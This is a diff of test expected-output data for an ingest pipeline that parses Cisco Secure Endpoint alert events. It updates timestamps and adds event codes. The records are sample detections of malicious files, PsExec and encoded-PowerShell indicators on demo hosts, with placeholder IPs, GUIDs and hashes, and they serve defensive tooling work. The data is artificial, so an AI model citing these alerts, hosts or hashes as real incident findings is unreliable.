                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:03:40.000Z",
                 "action": "Cloud IOC",
@@ -1202,11 +1216,12 @@
             },
             "event": {
                 "severity": 2,
-                "action": "Quarantine Failure",
-                "ingested": "2021-09-27T00:40:55.631387803Z",
+                "ingested": "2021-09-30T00:13:59.322446200Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
-                "id": "6880587034675643000",
-                "kind": "alert"
+                "code": "2164260880",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6880587034675643000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1274,11 +1289,12 @@
             },
             "event": {
                 "severity": 2,
-                "action": "Quarantine Failure",
-                "ingested": "2021-09-27T00:40:55.631389732Z",
+                "ingested": "2021-09-30T00:13:59.322448420Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
-                "id": "6880587034675643000",
-                "kind": "alert"
+                "code": "2164260880",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6880587034675643000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1346,11 +1362,12 @@
             },
             "event": {
                 "severity": 2,
-                "action": "Quarantine Failure",
-                "ingested": "2021-09-27T00:40:55.631391769Z",
+                "ingested": "2021-09-30T00:13:59.322450805Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
-                "id": "6880587034675643000",
-                "kind": "alert"
+                "code": "2164260880",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6880587034675643000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1418,11 +1435,12 @@
             },
             "event": {
                 "severity": 2,
-                "action": "Quarantine Failure",
-                "ingested": "2021-09-27T00:40:55.631393728Z",
+                "ingested": "2021-09-30T00:13:59.322453046Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
-                "id": "6880587034675643000",
-                "kind": "alert"
+                "code": "2164260880",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6880587034675643000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1490,11 +1508,12 @@
             },
             "event": {
                 "severity": 2,
-                "action": "Quarantine Failure",
-                "ingested": "2021-09-27T00:40:55.631395647Z",
+                "ingested": "2021-09-30T00:13:59.322455312Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
-                "id": "6880587034675643000",
-                "kind": "alert"
+                "code": "2164260880",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6880587034675643000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1583,8 +1602,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631397566Z",
+                "ingested": "2021-09-30T00:13:59.322457554Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6880587030380676000",
@@ -1666,8 +1686,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631399480Z",
+                "ingested": "2021-09-30T00:13:59.322459771Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T09:56:55.000Z",
                 "action": "Cloud IOC",
@@ -1755,8 +1776,9 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-27T00:40:55.631401430Z",
+                "ingested": "2021-09-30T00:13:59.322461976Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
+                "code": "553648173",
                 "kind": "alert",
                 "action": "File Fetch Completed",
                 "id": "6508191586038317000",
@@ -1833,8 +1855,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631403351Z",
+                "ingested": "2021-09-30T00:13:59.322464211Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T05:49:06.000Z",
                 "action": "Cloud IOC",
@@ -1913,8 +1936,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631405395Z",
+                "ingested": "2021-09-30T00:13:59.322466602Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}",
+                "code": "1107296278",
                 "kind": "alert",
                 "action": "Threat Detected in Low Prevalence Executable",
                 "id": "1515350231459808800",
@@ -1994,8 +2018,9 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-27T00:40:55.631407320Z",
+                "ingested": "2021-09-30T00:13:59.322468873Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
+                "code": "553648173",
                 "kind": "alert",
                 "action": "File Fetch Completed",
                 "id": "6508191586038317000",
@@ -2057,11 +2082,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:40:55.631409252Z",
+                "ingested": "2021-09-30T00:13:59.322471084Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6583671182384431000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6583671182384431000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -2120,8 +2146,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631411176Z",
+                "ingested": "2021-09-30T00:13:59.322477067Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6411132837046518000",
@@ -2195,8 +2222,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631413106Z",
+                "ingested": "2021-09-30T00:13:59.322479467Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6411132837046518000",
@@ -2272,8 +2300,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631415038Z",
+                "ingested": "2021-09-30T00:13:59.322481709Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 